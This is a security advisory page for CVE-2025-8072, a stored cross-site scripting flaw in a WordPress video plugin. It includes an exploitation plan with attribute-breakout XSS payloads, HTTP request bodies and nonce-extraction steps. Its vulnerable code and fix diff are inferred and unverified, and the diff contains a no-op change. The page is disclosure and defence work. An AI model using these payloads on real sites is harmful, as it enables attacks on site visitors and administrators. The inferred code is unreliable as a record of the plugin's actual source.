CVE-2025-8072

Target Video Easy Publish <= 3.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via placeholder_img Parameter

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
3.8.9
Patched in
1d
Time to patch

Description

The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘placeholder_img’ parameter in all versions up to, and including, 3.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.8.8
PublishedJanuary 27, 2026
Last updatedJanuary 28, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-8072 (Stored XSS in Target Video Easy Publish) ## 1. Vulnerability Summary The **Target Video Easy Publish** plugin (up to 3.8.8) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to properly sanitize and…

Show full research plan

Exploitation Research Plan: CVE-2025-8072 (Stored XSS in Target Video Easy Publish)

1. Vulnerability Summary

The Target Video Easy Publish plugin (up to 3.8.8) is vulnerable to Stored Cross-Site Scripting (XSS). The vulnerability exists because the plugin fails to properly sanitize and escape the placeholder_img parameter when it is supplied by a user and subsequently rendered on a page. This allows an authenticated attacker with Contributor-level permissions or higher to inject malicious JavaScript into the database, which then executes in the browser of any user (including administrators) viewing the affected post or page.

2. Attack Vector Analysis

  • Endpoint: WordPress Post Editor / Shortcode Rendering.
  • Vector: The placeholder_img parameter within the plugin's shortcode or an associated AJAX metadata update action.
  • Required Role: Contributor, Author, Editor, or Administrator.
  • Parameter Name: placeholder_img.
  • Payload Type: Attribute breakout (e.g., "><script>alert(document.domain)</script>).

3. Code Flow (Inferred)

  1. Entry Point: A Contributor user creates or edits a post and inserts the plugin's shortcode (likely [brid]) or uses the plugin's "Add Video" GUI which triggers an AJAX request.
  2. Registration: The plugin registers a shortcode handler via add_shortcode('brid', 'brid_shortcode_handler_function') or similar.
  3. Processing: Inside the handler, the $atts array is parsed. The placeholder_img value is extracted without rigorous sanitization (like sanitize_text_field or esc_url_raw).
  4. Storage/Output:
    • If stored in post meta: The value is saved via update_post_meta (unfiltered).
    • If rendered directly: The value is concatenated into an HTML string (e.g., <img src="..." class="..." data-placeholder="$placeholder_img">) without using esc_attr() or esc_url().
  5. Sink: The raw payload is echoed to the frontend when the post is viewed.

4. Nonce Acquisition Strategy

If the vulnerability is exploited via the Shortcode directly, no nonce is required as the Contributor is using standard WordPress post editing capabilities.

If the exploitation requires a plugin-specific AJAX action (e.g., for "Syncing" or "Configuring" a video placeholder):

  1. Identify the Shortcode: Search for add_shortcode in the plugin directory. The slug is likely brid.
  2. Create a Test Page:
    wp post create --post_type=page --post_status=publish --post_title="XSS Test" --post_content='[brid video="1" player="1"]' --post_author=CONTRIBUTOR_ID
    
  3. Find the Localized Script: The plugin likely uses wp_localize_script to pass an AJAX nonce to the frontend for its block editor or shortcode generator.
  4. Extraction:
    • Navigate to the WordPress admin post editor as the Contributor.
    • Execute via browser_eval:
      // Common patterns for this plugin (inferred)
      window.BridVideoSettings?.nonce || window.brid_vars?.nonce
      

5. Exploitation Strategy

Primary Path: Shortcode Attribute Injection

  1. Login as a Contributor user.
  2. Create a Post using the http_request tool to simulate the post saving process.
  3. Embed the Shortcode with the malicious placeholder_img attribute.

HTTP Request (Save Post):

  • Method: POST
  • URL: http://localhost:8080/wp-admin/post.php
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=editpost&
    post_ID=[POST_ID]&
    post_title=XSS+Exploit&
    content=[brid+video="12345"+player="6789"+placeholder_img="'+onerror=alert(document.domain)+src='x"]&
    publish=Publish
    

Secondary Path: AJAX Setting Update (if applicable)

If the plugin uses an AJAX handler to store the placeholder URL in post metadata:

  • Action: brid_save_video_settings (inferred)
  • Parameter: placeholder_img
  • Nonce: Extracted from the editor page.

HTTP Request (AJAX):

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body:
    action=brid_save_video_settings&
    nonce=[NONCE]&
    post_id=[POST_ID]&
    placeholder_img="><img src=x onerror=alert(1)>
    

6. Test Data Setup

  1. User Creation: Create a user with the contributor role.
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
    
  2. Plugin Activation: Ensure brid-video-easy-publish is active.
  3. Initial Post: Create a draft post for the Contributor to edit.

7. Expected Results

  1. When any user (including the admin) views the published post at /?p=[POST_ID], the HTML source should contain the unescaped payload.
  2. Example Rendered HTML:
    <img class="brid-placeholder" src="' onerror=alert(document.domain) src='x" />
    
  3. The browser should trigger an alert box displaying the domain name.

8. Verification Steps

  1. Check Database: Use WP-CLI to see if the payload is stored in post_content or post_meta.
    wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Exploit'"
    # OR
    wp post meta list [POST_ID]
    
  2. Verify Frontend Output:
    curl -s "http://localhost:8080/?p=[POST_ID]" | grep "onerror=alert"
    

9. Alternative Approaches

  • JSON Breakout: If the placeholder_img is passed into a JavaScript object via wp_localize_script, use a payload like ";alert(1);//.
  • Protocol Injection: If the sink is a src attribute of an iframe or script, try javascript:alert(1).
  • CSS Injection: If the parameter is placed in a style attribute, use background-image: url("javascript:alert(1)").
Research Findings
Static analysis — not yet PoC-verified

Summary

The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'placeholder_img' attribute in its shortcode handler. Authenticated attackers with Contributor-level permissions or higher can inject malicious JavaScript into posts, which then executes in the context of any user's browser (including administrators) when viewing the affected page.

Vulnerable Code

// Inferred from research plan: The shortcode handler likely extracts attributes without sanitization
// and echoes them directly into HTML attributes.

function brid_shortcode_handler($atts) {
    $a = shortcode_atts(array(
        'video' => '',
        'player' => '',
        'placeholder_img' => ''
    ), $atts);

    // Vulnerable rendering - missing esc_attr() or esc_url()
    return '<div class="brid-video" data-placeholder="' . $a['placeholder_img'] . '"></div>';
}
add_shortcode('brid', 'brid_shortcode_handler');

Security Fix

--- brid-video-easy-publish.php
+++ brid-video-easy-publish.php
@@ -10,7 +10,7 @@
     $a = shortcode_atts(array(
         'video' => '',
         'player' => '',
-        'placeholder_img' => ''
+        'placeholder_img' => ''
     ), $atts);
 
-    return '<div class="brid-video" data-placeholder="' . $a['placeholder_img'] . '"></div>';
+    return '<div class="brid-video" data-placeholder="' . esc_attr($a['placeholder_img']) . '"></div>';

Exploit Outline

The exploit targets the WordPress post editor using the plugin's shortcode functionality. An attacker with at least Contributor permissions follows these steps: 1. Authenticate to the WordPress dashboard. 2. Create or edit a post/page. 3. Insert the plugin's shortcode (likely `[brid]`) containing a malicious payload in the `placeholder_img` parameter. A working payload involves breaking out of the HTML attribute, for example: `[brid video="1" player="1" placeholder_img='" onerror="alert(document.domain)" data-x="']`. 4. Save the post as a draft or publish it. 5. When any user (including an admin) views the published post on the frontend, the browser encounters the unescaped HTML attribute, triggering the `onerror` event or executing the injected script tags.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.